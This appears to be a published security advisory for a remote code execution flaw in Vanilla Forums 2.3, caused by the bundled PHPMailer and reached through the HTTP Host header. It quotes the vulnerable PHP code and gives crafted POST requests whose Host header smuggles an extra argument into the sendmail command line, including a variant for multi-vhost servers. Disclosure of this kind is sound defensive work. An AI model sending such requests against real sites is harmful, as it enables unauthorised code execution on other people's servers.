I. VULNERABILITY
-------------------------
Vanilla Forums <= 2.3 Unauth. Remote Code Execution (RCE) exploit CVE-2016-10033 [0day]
II. BACKGROUND
-------------------------
"Community Forums Reinvented
Create an online community that your customers will love. Vanilla's forum
software is used by top brands to engage customers, drive loyalty and reduce
support costs."
"Vanilla provides cloud and open source community forum software that powers
discussion forums worldwide with close to 1M downloads.
Built for flexibility and integration, Vanilla is the best, most powerful
community solution in the world."
https://vanillaforums.com/en/software/
https://open.vanillaforums.com/
III. INTRODUCTION
-------------------------
Vanilla Forums software (including the latest stable version of 2.3 in
its default configuration) is affected by:
** Remote Code Execution CVE-2016-10033 (0day) **
which can be exploited by unauthenticated remote attackers to execute
arbitrary code and fully compromise the target application when combined
with Host Header injection vulnerability CVE-2016-10073 (described in
a separate advisory).
IV. DESCRIPTION
-------------------------
As described in the advisory of CVE-2016-10073:
The HOST header is used to form the sender email address as we can see
in the following snippet of code:
```
------[ library/core/class.email.php ]------
...
public function from($SenderEmail = '', $SenderName = '', $bOverrideSender = false) {
if ($SenderEmail == '') {
$SenderEmail = c('Garden.Email.SupportAddress', '');
if (!$SenderEmail) {
$SenderEmail = 'noreply@'.Gdn::request()->host();
}
}
if ($SenderName == '') {
$SenderName = c('Garden.Email.SupportName', c('Garden.Title', ''));
}
if ($this->PhpMailer->Sender == '' || $bOverrideSender) {
$this->PhpMailer->Sender = $SenderEmail;
}
ob_start();
$this->PhpMailer->setFrom($SenderEmail, $SenderName, false);
ob_end_clean();
return $this;
}
```
In default configuration of Vanilla the address is then passed
to the phpmailer library as the sender address in the line:
```
$this->PhpMailer->Sender = $SenderEmail;
```
The official stable version 2.3 available at:
https://open.vanillaforums.com/addon/vanilla-core-2.3
is bundled with PHPMailer library in version 5.1:
```
-----[ library/vendors/phpmailer/class.phpmailer.php ]----
<?php
/*~ class.phpmailer.php
| Software: PHPMailer - PHP email class
| Version: 5.1
```
This version of PHPMailer is affected by the:
`PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)`
vulnerability also discovered by the author of this advisory
and described in detail at:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Similarly to recently disclosed exploit of WordPress Core 4.6 RCE:
https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
remote attackers may exploit the phpmailer vulnerability in Vanilla Forums
by passing the payload (additional parameters to `/usr/sbin/sendmail`) within the HOST
header.
For example, the following web request:
```
POST /vanilla2-3/entry/passwordrequest HTTP/1.1
Host: vanilla-forums-vhost -X
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
Content-Length: 149
hpt=&Target=discussions&ClientHour=2017-05-10+22%3A00&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON
```
would inject `-X` parameter at the end of the argument list passed to
`/usr/bin/sendmail` :
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-oi]
Arg no. 4 == [-f]
Arg no. 5 == [noreply@attackers_server]
Arg no. 6 == [-X]
** NOTE:**
It should be noted that this vulnerability can still be exploited even if Vanilla
software is hosted on Apache web server with several name-based vhosts enabled, and
despite not being the default vhost.
This is possible as the attacker can take advantage of HTTP/1.0
protocol and specify the exact vhost within the URL. This will allow the `HOST `
header to be set to arbitrary value as the Apache server will obtain the `SERVER_NAME `
from the provided URL.
This will ensure that the malicious request will reach the affected code despite invalid
vhost within the `HOST` header.
To demonstrate, the above web request could be simply modified to:
```
POST http://vanilla-forums-vhost/vanilla2-3/entry/passwordrequest HTTP/1.1
Host: arbitrary-string -X
```
to achieve the same effect on a host with multiple vhosts.
暂无评论